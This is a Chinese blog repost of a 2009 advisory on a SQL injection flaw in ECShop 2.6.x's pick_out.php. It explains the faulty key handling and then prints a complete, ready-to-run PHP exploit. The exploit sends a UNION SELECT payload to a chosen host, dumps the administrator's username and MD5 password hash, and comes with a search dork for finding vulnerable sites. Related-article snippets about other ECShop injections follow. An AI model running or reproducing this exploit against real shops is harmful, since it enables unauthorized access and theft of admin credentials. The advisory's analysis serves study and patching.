ECSHOP商城系统过滤不严导致SQL注入漏洞

最新推荐文章于 2024-07-18 16:43:09 发布
最新推荐文章于 2024-07-18 16:43:09 发布
阅读量1.5k 收藏
点赞数
分类专栏: PHP

添加时间:
2009-05-25

系统编号:
WAVDB-01431

影响版本:
ECSHOP 2.6.1/2.6.2

程序介绍: 
ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。

漏洞分析:

文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep():


// includes/init.php   
if (!get_magic_quotes_gpc())   
{   
    if (!emptyempty($_GET))   
    {   
        $_GET  = addslashes_deep($_GET);   
    }   
    if (!emptyempty($_POST))   
    {   
        $_POST = addslashes_deep($_POST);   
    }   
   
    $_COOKIE   = addslashes_deep($_COOKIE);   
    $_REQUEST  = addslashes_deep($_REQUEST);   
}   
addslashes_deep()在文件includes/lib_base.php里最后通过addslashes()处理
 
// includes/lib_base.php   
function addslashes_deep($value)   
{   
    if (emptyempty($value))   
    {   
        return $value;   
    }   
    else   
    {   
        return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);   
    // 只处理了数组的值:)   
    }   
}   
下面看下具体的导致漏洞的代码,文件 pick_out.php里:
 
 
// pick_out.php   
if (!emptyempty($_GET['attr']))   
{   
    foreach($_GET['attr'] as $key => $value)   
    {   
        $key = intval($key);   
        $_GET['attr'][$key] = htmlspecialchars($value);   
        // foreach处理的是指定数组的拷贝,所以这里的处理并不影响数组原先的key和value   
        // 因此可以引入任意的key:)   
        // 程序员的逻辑出了问题?   
    }   
}   
...   
        foreach ($_GET['attr'] AS $key => $value)   
        {   
            $attr_url .= '&attr[' . $key . ']=' . $value;   
   
            $attr_picks[] = $key;   
            if ($i > 0)   
            {   
                if (emptyempty($goods_result))   
                {   
                    break;   
                }   
                // 利用key进行注射:)   
                $goods_result = $db->getCol("Select goods_id FROM " . $ecs->table("goods_attr") . " Where goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attr_value='$value'");   
由于magic_quotes_gpc=off时没有对$key处理,同时在数组赋值时存在逻辑问题,最终导致了注射漏洞.

漏洞利用: 
 


#!/usr/bin/php   
<?php   
//本程序只作技术交流,请不要用做非法用途!!   
print_r('   
+---------------------------------------------------------------------------+  

ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit   
by puret_t   
mail: puretot at gmail dot com   
team: http://bbs.wolvez.org   
dork: "Powered by ECShop"   
+---------------------------------------------------------------------------+   
');   
/**  
 * works with magic_quotes_gpc = Off  
 */   
if ($argc < 3) {   
    print_r('   
+---------------------------------------------------------------------------+   
Usage: php '.$argv[0].' host path   
host:      target server (ip/hostname)   
path:      path to ecshop   
Example:   
php '.$argv[0].' localhost /ecshop/   
+---------------------------------------------------------------------------+   
');   
    exit;   
}   
   
error_reporting(7);   
ini_set('max_execution_time', 0);   
   
$host = $argv[1];   
$path = $argv[2];   
   
$resp = send();   
preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);   
   
if ($hash)   
    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");   
else   
    exit("Exploit Failed!\n");   
   
function send()   
{   
    global $host, $path;   
   
    $cmd = 'cat_id=999999&attr[%27%20UNION%20Select%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20Where%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';   
   
    $data = "GET ".$path."pick_out.php?".$cmd."  HTTP/1.1\r\n";   
    $data .= "Host: $host\r\n";   
    $data .= "Connection: Close\r\n\r\n";   
   
    $fp = fsockopen($host, 80);   
    fputs($fp, $data);   
   
    $resp = '';   
   
    while ($fp && !feof($fp))   
        $resp .= fread($fp, 1024);   
   
    return $resp;   
}   
   
?>   
 

解决方案:
厂商补丁
ECSHOP
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ecshop.com


信息来源:
<*来源: ryat#www.wolvez.org
链接: http://www.80vul.com
*>

bjash
关注
专栏目录
ecshop测试_ECShop最新4.1.0前台免登录SQL注入0day漏洞披露与分析
weixin_36124631的博客
01-19 1211
0x00 漏洞概述影响版本:ecshop4.1.0及以下是否需要身份认证:否,前台漏洞漏洞类型:SQL注入CNVD编号:CNVD-2020-58823,https://www.cnvd.org.cn/flaw/show/2454613漏洞来源:xcheck代码安全检查源码获取:https://www.ecshop.com/,登录注册下载,最新版本为4.1.1(已修复)。0x01 漏洞详情...
ECShop 4.x collection_listSQL注入
weixin_56537388的博客
11-27 410
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。访问8080端口,数据库主机为mysql,账号密码为root。注册一个账户然后登录。docker环境搭建。
ecshop 2.x/3.x SQL注入/代码执行
最新发布
qq_23003811的博客
07-18 308
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞,其3.6.0最新版已修复该漏洞。3、在Referer处修改payload。1、漏洞发生是在会员登录页面。2、生成payload的脚本。
ecshop漏洞user.php,ECShop 2.7.2 最新任意用户登陆漏洞
weixin_26804345的博客
03-23 362
由于最近项目需要, 查看了下商派最新发布的ecshop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台漏洞的影响ECShop 2.7.2ECShop 2.7.1 不受影响漏洞的出现漏洞出现在/include/init.php文件的512行左右, 代码如下:ecshop 2.7.2 最新任意用户登录漏...
ECShop 2.7.2 最新任意用户登陆漏洞
hypocode的专栏
05-05 366
本文转载自 http://www.risecq.com/ecshop-2-7-2-%E6%9C%80%E6%96%B0%E6%BC%8F%E6%B4%9E 由于最近项目需要, 查看了下商派最新发布的ECShop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台
php前台登录 sql注入_ECShop 4.0 前台SQL注入漏洞分析(需用户注册)
weixin_39711867的博客
03-09 534
#00 前言前两天看到有公众号发了ECShop的注入分析漏洞,所以想看下与笔者挖的是否重复,看完还是非常佩服作者的分析水平,基于Nday然后对整个利用链进行回溯分析,从而发现0day,对代码审计人员帮助颇多,不过这个漏洞需要用户注册,严格意义上来讲需要进行用户认证,因此危害性还不至于那么广泛。#01 漏洞分析整个漏洞利用链是基于两年前广泛流传的ECShop RCE漏洞链来的,笔者在挖掘ECShop...
web应用漏洞.docx
07-05
3. ECShop 后台过滤不严可获取 shell:攻击者可以通过该漏洞获取 shell 权限。 4. FengCMS app/model/dbmanageModel.php 任意文件删除漏洞:攻击者可以通过该漏洞删除任意文件。 5. FengCMS app/model/messageModel....
ECShop v2.7.2 正式版 GBK.rar
07-09
礼包不能购买5、邮件杂志中添加插入图片插入相对路径导致发送邮件图片无法显示6、Search.php页面过滤不严导致SQL注入漏洞以及后台开店向导会产生的漏洞7、flow文件过滤不严8、前台用户越权操作9、礼包id未过滤10、...
ecshop模拟攻防系统
06-19
- SQL注入攻击:学习如何利用输入验证不严漏洞执行恶意SQL语句,以及如何防止此类攻击。 - XSS攻击:了解如何通过网页注入脚本代码来窃取用户信息,以及设置过滤规则和HTTP头部策略来防止XSS攻击。 - DDoS攻击:...
ECShop利用工具
10-25
2. **XSS跨站脚本**:XSS攻击是利用网站应用程序对用户输入的数据处理不严,将恶意脚本插入到网页中,当其他用户访问这些页面时,恶意脚本被执行,可能导致会话劫持、个人信息窃取等。 3. **文件上传漏洞**:如果...
ECShop V2.7.2 UTF-8 正式版.rar
07-09
[修正] 修正gbk手机发送错误 [修正] 修正category页面过滤不严导致SQL注入漏洞 [修正] 修正关闭库存管理且库存不足, 礼包不能购买 [修正] 修正邮件杂志中添加插入图片插入相对路径导致发送邮件图片无法显示 [修正] ...
category.php漏洞,ECShop V2.7.2 category.php SQL Injection Vulnerability
weixin_42151599的博客
04-01 218
### 漏洞代码分析/category.php```..$filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0';//变量 $filter_attr_str 是以“.” 分开的数组$filter_attr = empty($filter_attr_str) ? '' : exp...
ECSHOP 2.7.2二次注入分析
From2006To2011的博客
06-02 219
这是一个很老的漏洞了。最近学习代码审计在乌云上看到的,作者只给了部分分析,和利用的exp。 0x1代码分析 漏洞出现在flow.php 在flow.php的372行有如下代码 { /* * 保存收货人信息 */ $consignee = array( 'address_id'...
ecshop SQL注入漏洞 admin/shopinfo.php ecshop SQL注入漏洞
Summersblue的博客
10-30 6396
阿里云这点做的很厚道,真心不错/home/wwwroot/admin/shopinfo.php ecshop SQL注入漏洞 先备份好文件后再操作/admin/shopinfo.php修复方法(大概在第53、71、105、123行,4个地方修复方式都一样) admin_priv(‘shopinfo_manage’); 修改为 admin_priv(‘shopinfo
ecshop SQL注入通杀漏洞以及后台拿SHELL
11-25 8462
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术    标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给个警告,下面记载下这个Ecshop通杀漏洞吧! 先用下面的代码看下表的前缀(运气好下面的代码就把账号密码注射出来了) search.ph
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
qq_51577576的博客
10-01 1772
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
关于ecshopsql注入漏洞修复
weixin_30439031的博客
07-20 161
ecshop系统部署在阿里云服务器上,阿里云提示Web-CMS漏洞: 修复方法如下: 1./admin/shopinfo.php 大概在第53、71、105、123行,4个地方修复方式都一样 admin_priv('shopinfo_manage'); 修改为 admin_priv('shopinfo_manage'); $_REQUEST['id'] = intv...
Eecshop 4.x collection_list SQL注入 漏洞复现
weixin_44896127的博客
12-20 672
Eecshop 4.x collection_list SQL注入漏洞复现。
ECSHOP模板开发指南:网上商城系统二次开发教程
"ecshop二次开发资料教程,适用于对php不太熟悉的初级开发者,内容包括ecshop网上商城系统的模板制作引导,详细介绍了模板结构、标签系统等核心开发知识。" ECSHOP是一款由Comsenz公司开发的B2C独立网店系统,其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值